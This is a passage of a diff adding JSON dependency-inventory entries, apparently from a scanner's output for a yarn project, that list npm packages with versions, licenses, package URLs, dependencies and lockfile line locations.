"yarn" + }, + { + "ID": "cssesc@3.0.0", + "Name": "cssesc", + "Identifier": { + "PURL": "pkg:npm/cssesc@3.0.0", + "UID": "d4c72b9c20dc2e14" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4422, + "EndLine": 4425 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "csso@5.0.5", + "Name": "csso", + "Identifier": { + "PURL": "pkg:npm/csso@5.0.5", + "UID": "fcfa82f12c163c9e" + }, + "Version": "5.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-tree@2.2.1" + ], + "Locations": [ + { + "StartLine": 4427, + "EndLine": 4432 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "debug@2.6.9", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@2.6.9", + "UID": "941415b7bcc27f1e" + }, + "Version": "2.6.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.0.0" + ], + "Locations": [ + { + "StartLine": 4485, + "EndLine": 4490 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "f96e8fd29dd51c9a" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.1.3" + ], + "Locations": [ + { + "StartLine": 4478, + "EndLine": 4483 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "decamelize@1.2.0", + "Name": "decamelize", + "Identifier": { + "PURL": "pkg:npm/decamelize@1.2.0", + "UID": "f54ceb07c132b039" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4500, + "EndLine": 4503 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "decamelize-keys@1.1.1", + "Name": "decamelize-keys", + "Identifier": { + "PURL": "pkg:npm/decamelize-keys@1.1.1", + "UID": "93680595f4609ac8" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "decamelize@1.2.0", + "map-obj@1.0.1" + ], + "Locations": [ + { + "StartLine": 4492, + "EndLine": 4498 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "decode-uri-component@0.2.2", + "Name": "decode-uri-component", + "Identifier": { + "PURL": "pkg:npm/decode-uri-component@0.2.2", + "UID": "a63ffa3913e5025a" + }, + "Version": "0.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4505, + "EndLine": 4508 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "decompress-response@6.0.0", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@6.0.0", + "UID": "4306e036c090406e" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mimic-response@3.1.0" + ], + "Locations": [ + { + "StartLine": 4510, + "EndLine": 4515 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "deep-extend@0.6.0", + "Name": "deep-extend", + "Identifier": { + "PURL": "pkg:npm/deep-extend@0.6.0", + "UID": "84cd415aa8b2b546" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4522, + "EndLine": 4525 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "deepmerge@3.3.0", + "Name": "deepmerge", + "Identifier": { + "PURL": "pkg:npm/deepmerge@3.3.0", + "UID": "36fe3eafa47a1273" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4532, + "EndLine": 4535 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "deepmerge@4.3.1", + "Name": "deepmerge", + "Identifier": { + "PURL": "pkg:npm/deepmerge@4.3.1", + "UID": "1d5fdb5e4f0a2a5f" + }, + "Version": "4.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4537, + "EndLine": 4540 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "defaults@1.0.4", + "Name": "defaults", + "Identifier": { + "PURL": "pkg:npm/defaults@1.0.4", + "UID": "e54859122b20c968" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "clone@1.0.4" + ], + "Locations": [ + { + "StartLine": 4542, + "EndLine": 4547 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "define-data-property@1.1.4", + "Name": "define-data-property", + "Identifier": { + "PURL": "pkg:npm/define-data-property@1.1.4", + "UID": "ed1df82c7bb28e2b" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-define-property@1.0.1", + "es-errors@1.3.0", + "gopd@1.2.0" + ], + "Locations": [ + { + "StartLine": 4549, + "EndLine": 4556 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "delayed-stream@1.0.0", + "Name": "delayed-stream", + "Identifier": { + "PURL": "pkg:npm/delayed-stream@1.0.0", + "UID": "bb3961b6fcff1b4" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4567, + "EndLine": 4570 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "delegates@1.0.0", + "Name": "delegates", + "Identifier": { + "PURL": "pkg:npm/delegates@1.0.0", + "UID": "3c3cbb90c45c5698" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4572, + "EndLine": 4575 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "depd@2.0.0", + "Name": "depd", + "Identifier": { + "PURL": "pkg:npm/depd@2.0.0", + "UID": "99d5df616914c5bf" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4577, + "EndLine": 4580 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "destroy@1.2.0", + "Name": "destroy", + "Identifier": { + "PURL": "pkg:npm/destroy@1.2.0", + "UID": "58552c2eb23e6bd6" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4591, + "EndLine": 4594 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "detect-indent@6.1.0", + "Name": "detect-indent", + "Identifier": { + "PURL": "pkg:npm/detect-indent@6.1.0", + "UID": "5a71346f76404511" + }, + "Version": "6.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4596, + "EndLine": 4599 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "detect-libc@2.1.2", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@2.1.2", + "UID": "4295fee1cc3f0edb" + }, + "Version": "2.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4601, + "EndLine": 4604 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "diff@8.0.2", + "Name": "diff", + "Identifier": { + "PURL": "pkg:npm/diff@8.0.2", + "UID": "e499c88b2fc9c33d" + }, + "Version": "8.0.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4616, + "EndLine": 4617 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "dom-serializer@2.0.0", + "Name": "dom-serializer", + "Identifier": { + "PURL": "pkg:npm/dom-serializer@2.0.0", + "UID": "5ed2e8d976eef47b" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0", + "domhandler@5.0.3", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 4640, + "EndLine": 4647 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "domelementtype@2.3.0", + "Name": "domelementtype", + "Identifier": { + "PURL": "pkg:npm/domelementtype@2.3.0", + "UID": "bf7273cf9dbcf2c3" + }, + "Version": "2.3.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4649, + "EndLine": 4652 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "domhandler@5.0.3", + "Name": "domhandler", + "Identifier": { + "PURL": "pkg:npm/domhandler@5.0.3", + "UID": "587c5daaf01d54d5" + }, + "Version": "5.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "domelementtype@2.3.0" + ], + "Locations": [ + { + "StartLine": 4654, + "EndLine": 4659 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "domutils@3.2.2", + "Name": "domutils", + "Identifier": { + "PURL": "pkg:npm/domutils@3.2.2", + "UID": "d2bb43a799e267ed" + }, + "Version": "3.2.2", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dom-serializer@2.0.0", + "domelementtype@2.3.0", + "domhandler@5.0.3" + ], + "Locations": [ + { + "StartLine": 4661, + "EndLine": 4668 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "dooboolab-welcome@1.3.2", + "Name": "dooboolab-welcome", + "Identifier": { + "PURL": "pkg:npm/dooboolab-welcome@1.3.2", + "UID": "2e82cd394dab7a43" + }, + "Version": "1.3.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4670, + "EndLine": 4673 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "dot-case@3.0.4", + "Name": "dot-case", + "Identifier": { + "PURL": "pkg:npm/dot-case@3.0.4", + "UID": "8ae8a08b8383edc6" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "no-case@3.0.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 4675, + "EndLine": 4681 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "dunder-proto@1.0.1", + "Name": "dunder-proto", + "Identifier": { + "PURL": "pkg:npm/dunder-proto@1.0.1", + "UID": "a08b215bde4b1f9c" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-errors@1.3.0", + "gopd@1.2.0" + ], + "Locations": [ + { + "StartLine": 4683, + "EndLine": 4690 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "eastasianwidth@0.2.0", + "Name": "eastasianwidth", + "Identifier": { + "PURL": "pkg:npm/eastasianwidth@0.2.0", + "UID": "f7a9c7a4ccccc8a" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4692, + "EndLine": 4695 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ee-first@1.1.1", + "Name": "ee-first", + "Identifier": { + "PURL": "pkg:npm/ee-first@1.1.1", + "UID": "4a5a1bd050c93e83" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4697, + "EndLine": 4700 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "electron-to-chromium@1.5.233", + "Name": "electron-to-chromium", + "Identifier": { + "PURL": "pkg:npm/electron-to-chromium@1.5.233", + "UID": "cb51b457747c0dd6" + }, + "Version": "1.5.233", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4702, + "EndLine": 4705 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "emoji-regex@8.0.0", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@8.0.0", + "UID": "2b6c79e63e318c8" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4712, + "EndLine": 4715 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "emoji-regex@9.2.2", + "Name": "emoji-regex", + "Identifier": { + "PURL": "pkg:npm/emoji-regex@9.2.2", + "UID": "be3639790141f0" + }, + "Version": "9.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4717, + "EndLine": 4720 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "encodeurl@1.0.2", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@1.0.2", + "UID": "772129cdfea0f26f" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4722, + "EndLine": 4725 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "encodeurl@2.0.0", + "Name": "encodeurl", + "Identifier": { + "PURL": "pkg:npm/encodeurl@2.0.0", + "UID": "7b0b982e07be43b2" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4727, + "EndLine": 4730 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "encoding@0.1.13", + "Name": "encoding", + "Identifier": { + "PURL": "pkg:npm/encoding@0.1.13", + "UID": "e5099a99669c1c06" + }, + "Version": "0.1.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "iconv-lite@0.6.3" + ], + "Locations": [ + { + "StartLine": 4739, + "EndLine": 4744 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "end-of-stream@1.4.5", + "Name": "end-of-stream", + "Identifier": { + "PURL": "pkg:npm/end-of-stream@1.4.5", + "UID": "2db19997adec899c" + }, + "Version": "1.4.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "once@1.4.0" + ], + "Locations": [ + { + "StartLine": 4746, + "EndLine": 4751 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "entities@2.0.3", + "Name": "entities", + "Identifier": { + "PURL": "pkg:npm/entities@2.0.3", + "UID": "7748643e62f3cdf" + }, + "Version": "2.0.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4758, + "EndLine": 4761 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "entities@4.5.0", + "Name": "entities", + "Identifier": { + "PURL": "pkg:npm/entities@4.5.0", + "UID": "a61c47e18d4a47b7" + }, + "Version": "4.5.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4753, + "EndLine": 4756 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "env-paths@2.2.1", + "Name": "env-paths", + "Identifier": { + "PURL": "pkg:npm/env-paths@2.2.1", + "UID": "dc16b6c0dfd64ffb" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4763, + "EndLine": 4766 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "err-code@2.0.3", + "Name": "err-code", + "Identifier": { + "PURL": "pkg:npm/err-code@2.0.3", + "UID": "810abce0cadd03dd" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4773, + "EndLine": 4776 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "error-ex@1.3.4", + "Name": "error-ex", + "Identifier": { + "PURL": "pkg:npm/error-ex@1.3.4", + "UID": "3b32fa8f8467dd8a" + }, + "Version": "1.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-arrayish@0.2.1" + ], + "Locations": [ + { + "StartLine": 4778, + "EndLine": 4783 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "error-stack-parser@2.1.4", + "Name": "error-stack-parser", + "Identifier": { + "PURL": "pkg:npm/error-stack-parser@2.1.4", + "UID": "987ac540583fde74" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 4785, + "EndLine": 4790 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "es-define-property@1.0.1", + "Name": "es-define-property", + "Identifier": { + "PURL": "pkg:npm/es-define-property@1.0.1", + "UID": "d138e7c98101df53" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4860, + "EndLine": 4863 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "es-errors@1.3.0", + "Name": "es-errors", + "Identifier": { + "PURL": "pkg:npm/es-errors@1.3.0", + "UID": "c9cefd24c66514ea" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4865, + "EndLine": 4868 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "es-object-atoms@1.1.1", + "Name": "es-object-atoms", + "Identifier": { + "PURL": "pkg:npm/es-object-atoms@1.1.1", + "UID": "7c5399faf8f0f4c5" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0" + ], + "Locations": [ + { + "StartLine": 4892, + "EndLine": 4897 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "es-set-tostringtag@2.1.0", + "Name": "es-set-tostringtag", + "Identifier": { + "PURL": "pkg:npm/es-set-tostringtag@2.1.0", + "UID": "509e56fadd6b1c77" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "get-intrinsic@1.3.0", + "has-tostringtag@1.0.2", + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 4899, + "EndLine": 4907 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "escalade@3.2.0", + "Name": "escalade", + "Identifier": { + "PURL": "pkg:npm/escalade@3.2.0", + "UID": "96451fc493b1f0b" + }, + "Version": "3.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4925, + "EndLine": 4928 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "escape-html@1.0.3", + "Name": "escape-html", + "Identifier": { + "PURL": "pkg:npm/escape-html@1.0.3", + "UID": "aaa55f7323122087" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4930, + "EndLine": 4933 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "escape-string-regexp@1.0.5", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@1.0.5", + "UID": "44a99e7f6076034e" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4935, + "EndLine": 4938 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "escape-string-regexp@2.0.0", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@2.0.0", + "UID": "d979833ffdcf0d8b" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4940, + "EndLine": 4943 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "escape-string-regexp@4.0.0", + "Name": "escape-string-regexp", + "Identifier": { + "PURL": "pkg:npm/escape-string-regexp@4.0.0", + "UID": "de6ab94e13aec8b5" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4945, + "EndLine": 4948 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "esprima@4.0.1", + "Name": "esprima", + "Identifier": { + "PURL": "pkg:npm/esprima@4.0.1", + "UID": "6cbaaf70e831fd2b" + }, + "Version": "4.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5108, + "EndLine": 5111 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "etag@1.8.1", + "Name": "etag", + "Identifier": { + "PURL": "pkg:npm/etag@1.8.1", + "UID": "8318ebe35958b25b" + }, + "Version": "1.8.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5142, + "EndLine": 5145 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "event-target-shim@5.0.1", + "Name": "event-target-shim", + "Identifier": { + "PURL": "pkg:npm/event-target-shim@5.0.1", + "UID": "d5a3c84db17be25d" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5147, + "EndLine": 5150 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "events@3.3.0", + "Name": "events", + "Identifier": { + "PURL": "pkg:npm/events@3.3.0", + "UID": "f1807c15eff6781a" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5159, + "EndLine": 5162 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "events-universal@1.0.1", + "Name": "events-universal", + "Identifier": { + "PURL": "pkg:npm/events-universal@1.0.1", + "UID": "a02311b328801828" + }, + "Version": "1.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-events@2.7.0" + ], + "Locations": [ + { + "StartLine": 5152, + "EndLine": 5157 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "execa@5.1.1", + "Name": "execa", + "Identifier": { + "PURL": "pkg:npm/execa@5.1.1", + "UID": "d1f1fad9f076de6c" + }, + "Version": "5.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cross-spawn@7.0.6", + "get-stream@6.0.1", + "human-signals@2.1.0", + "is-stream@2.0.1", + "merge-stream@2.0.0", + "npm-run-path@4.0.1", + "onetime@5.1.2", + "signal-exit@3.0.7", + "strip-final-newline@2.0.0" + ], + "Locations": [ + { + "StartLine": 5164, + "EndLine": 5177 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "expand-template@2.0.3", + "Name": "expand-template", + "Identifier": { + "PURL": "pkg:npm/expand-template@2.0.3", + "UID": "8c9c379e99967e27" + }, + "Version": "2.0.3", + "Licenses": [ + "(MIT OR WTFPL)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5184, + "EndLine": 5187 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "exponential-backoff@3.1.2", + "Name": "exponential-backoff", + "Identifier": { + "PURL": "pkg:npm/exponential-backoff@3.1.2", + "UID": "d11a6e4c9edb31e3" + }, + "Version": "3.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5200, + "EndLine": 5203 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-base64-decode@1.0.0", + "Name": "fast-base64-decode", + "Identifier": { + "PURL": "pkg:npm/fast-base64-decode@1.0.0", + "UID": "ec7efe176c63fe2c" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5205, + "EndLine": 5208 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-deep-equal@3.1.3", + "Name": "fast-deep-equal", + "Identifier": { + "PURL": "pkg:npm/fast-deep-equal@3.1.3", + "UID": "a9f0028942cdefa3" + }, + "Version": "3.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5210, + "EndLine": 5213 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-fifo@1.3.2", + "Name": "fast-fifo", + "Identifier": { + "PURL": "pkg:npm/fast-fifo@1.3.2", + "UID": "fe85e3a70b23f6b3" + }, + "Version": "1.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5215, + "EndLine": 5218 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-glob@3.3.3", + "Name": "fast-glob", + "Identifier": { + "PURL": "pkg:npm/fast-glob@3.3.3", + "UID": "96cee0805d8f8984" + }, + "Version": "3.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@nodelib/fs.stat@2.0.5", + "@nodelib/fs.walk@1.2.8", + "glob-parent@5.1.2", + "merge2@1.4.1", + "micromatch@4.0.8" + ], + "Locations": [ + { + "StartLine": 5220, + "EndLine": 5229 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-json-stable-stringify@2.1.0", + "Name": "fast-json-stable-stringify", + "Identifier": { + "PURL": "pkg:npm/fast-json-stable-stringify@2.1.0", + "UID": "a5e6b973c9d55db5" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5231, + "EndLine": 5234 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fast-xml-parser@4.5.3", + "Name": "fast-xml-parser", + "Identifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "Version": "4.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "strnum@1.1.2" + ], + "Locations": [ + { + "StartLine": 5241, + "EndLine": 5246 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fastest-levenshtein@1.0.16", + "Name": "fastest-levenshtein", + "Identifier": { + "PURL": "pkg:npm/fastest-levenshtein@1.0.16", + "UID": "c256bdb95cdcf6bc" + }, + "Version": "1.0.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5248, + "EndLine": 5251 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fastq@1.19.1", + "Name": "fastq", + "Identifier": { + "PURL": "pkg:npm/fastq@1.19.1", + "UID": "c838ecceb09c794f" + }, + "Version": "1.19.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "reusify@1.1.0" + ], + "Locations": [ + { + "StartLine": 5253, + "EndLine": 5258 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "faye-websocket@0.11.4", + "Name": "faye-websocket", + "Identifier": { + "PURL": "pkg:npm/faye-websocket@0.11.4", + "UID": "619309b5fa44fb60" + }, + "Version": "0.11.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "websocket-driver@0.7.4" + ], + "Locations": [ + { + "StartLine": 5260, + "EndLine": 5265 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fb-watchman@2.0.2", + "Name": "fb-watchman", + "Identifier": { + "PURL": "pkg:npm/fb-watchman@2.0.2", + "UID": "c8843132e2e5678a" + }, + "Version": "2.0.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bser@2.1.1" + ], + "Locations": [ + { + "StartLine": 5267, + "EndLine": 5272 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fbjs@0.8.18", + "Name": "fbjs", + "Identifier": { + "PURL": "pkg:npm/fbjs@0.8.18", + "UID": "cd1f2795ee1bcda3" + }, + "Version": "0.8.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "core-js@1.2.7", + "isomorphic-fetch@2.2.1", + "loose-envify@1.4.0", + "object-assign@4.1.1", + "promise@7.3.1", + "setimmediate@1.0.5", + "ua-parser-js@0.7.41" + ], + "Locations": [ + { + "StartLine": 5274, + "EndLine": 5285 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fdir@6.5.0", + "Name": "fdir", + "Identifier": { + "PURL": "pkg:npm/fdir@6.5.0", + "UID": "4179e47e4f7c5da5" + }, + "Version": "6.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5287, + "EndLine": 5288 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fill-range@7.1.1", + "Name": "fill-range", + 